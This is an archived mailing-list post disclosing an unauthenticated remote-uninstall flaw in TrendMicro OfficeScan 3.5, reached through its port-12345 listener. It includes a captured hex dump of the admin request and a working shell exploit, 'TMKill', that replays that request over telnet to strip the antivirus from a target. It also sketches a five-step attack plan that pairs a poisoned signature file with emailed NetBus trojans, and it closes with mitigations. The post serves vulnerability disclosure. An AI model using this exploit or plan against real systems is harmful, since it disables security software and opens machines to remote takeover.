hi, while i continued my tests with TrendMicro OfficeScan 3.5, i tried something new with the anti-viral agent listening on the port 12345. First, i sniffed an admin request from the web-based centralized server toward the target. This request is in the http/1.0 protocol, so in a human readable form. this is an example of such a tracked request with the help of the very cool buttsniffer (BO plug-in ;) ) : ======= Source IP: x.x.x.x Target IP: x.x.x.x TCP Length: 533 Source Port: 1241 Target Port: 12345 Seq: 00815779 Ack: 01263158 Flags: PA Window: 8760 TCP ChkSum: 7159 UrgPtr: 0 00000000: 47 45 54 20 2F 3F 30 35 36 38 30 46 35 34 35 45 GET /?05680F545E 00000010: 38 38 41 45 44 35 33 39 32 42 38 38 35 45 45 37 88AED5392B885EE7 00000020: 31 34 32 44 38 42 42 46 38 45 33 35 32 36 39 33 142D8BBF8E352693 00000030: 37 32 35 34 33 30 44 43 31 45 37 46 39 35 34 46 725430DC1E7F954F 00000040: 42 33 34 35 46 45 38 39 39 46 30 31 32 30 33 42 B345FE899F01203B 00000050: 32 32 32 43 46 41 46 38 42 30 35 43 41 35 44 39 222CFAF8B05CA5D9 00000060: 30 43 46 35 44 45 45 37 33 38 31 30 32 41 42 31 0CF5DEE738102AB1 00000070: 43 41 45 45 45 36 32 46 37 46 34 41 41 33 36 45 CAEEE62F7F4AA36E 00000080: 43 44 32 30 43 42 35 45 41 44 45 43 32 43 35 34 CD20CB5EADEC2C54 00000090: 37 37 36 36 35 30 44 35 35 35 41 39 34 31 35 42 776650D555A9415B 000000A0: 45 35 33 34 38 45 37 46 30 30 46 39 38 31 41 35 E5348E7F00F981A5 000000B0: 44 42 45 45 31 46 33 41 42 33 30 46 41 42 43 34 DBEE1F3AB30FABC4 000000C0: 33 33 32 33 30 46 36 36 42 34 39 39 38 32 46 44 33230F66B49982FD 000000D0: 41 35 46 30 37 37 44 30 37 41 46 37 32 31 43 44 A5F077D07AF721CD 000000E0: 37 39 31 38 41 35 35 38 30 43 33 33 31 42 43 34 7918A5580C331BC4 000000F0: 43 32 41 39 35 39 42 46 36 33 34 31 31 32 42 34 C2A959BF634112B4 00000100: 46 39 41 39 33 39 35 33 42 38 46 36 34 42 30 32 F9A93953B8F64B02 00000110: 43 38 38 31 45 44 36 43 35 35 42 46 43 44 36 32 C881ED6C55BFCD62 00000120: 30 35 36 31 33 34 42 42 46 38 30 30 37 45 46 46 056134BBF8007EFF 00000130: 42 36 36 34 33 35 31 38 31 41 37 37 36 32 45 45 B66435181A7762EE 00000140: 30 32 42 38 39 31 33 46 35 34 35 44 32 35 31 31 02B8913F545D2511 00000150: 38 39 37 43 38 39 38 46 33 45 35 33 42 42 38 44 897C898F3E53BB8D 00000160: 34 46 34 45 43 37 31 45 37 46 41 43 36 44 38 45 4F4EC71E7FAC6D8E 00000170: 32 36 44 33 45 35 35 41 39 41 37 43 31 45 42 39 26D3E55A9A7C1EB9 00000180: 36 42 44 46 44 32 42 45 38 34 34 46 43 35 45 43 6BDFD2BE844FC5EC 00000190: 36 35 44 41 46 36 43 37 31 43 30 32 39 34 32 41 65DAF6C71C02942A 000001A0: 39 32 42 42 39 37 38 41 43 38 37 35 31 32 30 32 92BB978AC8751202 000001B0: 43 35 30 45 45 34 30 34 34 35 44 44 36 43 44 31 C50EE40445DD6CD1 000001C0: 31 43 45 31 31 41 39 39 30 34 20 48 54 54 50 2F 1CE11A9904 HTTP/ 000001D0: 31 2E 30 0D 0A 48 6F 73 74 3A 20 31 30 2E 31 2E 1.0..Host: x.x.x.x 000001E0: 36 2E 39 34 3A 31 32 33 34 35 0D 0A 55 73 65 72 :12345..User 000001F0: 2D 41 67 65 6E 74 3A 20 4F 66 66 69 63 65 53 63 -Agent: OfficeSc 00000200: 61 6E 2F 33 2E 35 0D 0A 41 63 63 65 70 74 3A 20 an/3.5..Accept: 00000210: 2A 2F 2A 0D 0A */*.. =========== Note the very big ascii string behind the default html document. This string means in this case: "remote un-installation of TrendMicro product" ! So i replaid the same request toward another client with success. Few seconds later, this workstation didn't have no longer OfficeScan installed on it.The product was removed from the hard disk on the target system. That attack was conducted against a windows NT 4.0 SP5 OfficeScan 3.5, since the problem relies in a protocol layer not in the system involved, others system like windows 9.X et windows 3.x should be infected too. Conclusion: A malicious user is able to remotly suppress every OfficeScan inside the company network (stealing the admin priviledge) without any authentication just because, this authentication is only used to launch the manager not to sign or crypt the paquets. Because the manager is used to do other administration task, it may be possible to upload a zero length signature file, for example. A dark scenario may be this one, in five steps: 1- the malicious user inject a bad signature file to all the pc 2- then he send his trojanned mail ( with a netbus attached ) to every users. 3- after a good time drinking his cola, he starts netbus client and look for all the possibly infected stations. 4- because 12345 is the netbus port too, admins should not understand immediatly that they r under attack 5- the attacker start his bad job . i wrote a little exploit too: #!/bin/sh # # Usage: TMKill target_ip # gdnat_private ( Gregory Duchemin ) # ( sleep 2 echo "GET /?05680F545E88AED5392B885EE7142D8BBF8E352693725430DC1E7F954FB345FE899F 01203B222CFAF8B05CA5D90CF5DEE738102AB1CAEEE62F7F4AA36ECD20CB5EADEC2C54776 650D555A9415BE5348E7F00F981A5DBEE1F3AB30FABC433230F66B49982FDA5F077D07AF721C D7918A5580C331BC4C2A959BF634112B4F9A93953B8F64B02C881ED6C55BFCD62056134BBF80 07EFFB66435181A7762EE02B8913F545D2511897C898F3E53BB8D4F4EC71E7FAC6D8E26D3E55A 9A7C1EB96BDFD2BE844FC5EC65DAF6C71C02942A92BB978AC8751202C50EE40445DD6CD11C E11A9904 HTTP/1.0" echo "Host:"$1":12345" echo "User-Agent: OfficeScan/3.5" echo "Accept:*/*" echo sleep 10 )| telnet $1 12345 2>&1 | tee -a ./log.txt Solutions: 1- contact TrendMicro. 2- close the 12345 port of all the stations, stop the service TMlisten in the services menu ( NT ), no more network upgrade till TrendMicro ll give us a patch. 3- install sniffers all over the network to track possible attackers. =================== Gregory Duchemin Network & Security Engineer. gdnat_private http://www.securite-internet.com ===================
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 15:38:05 PDT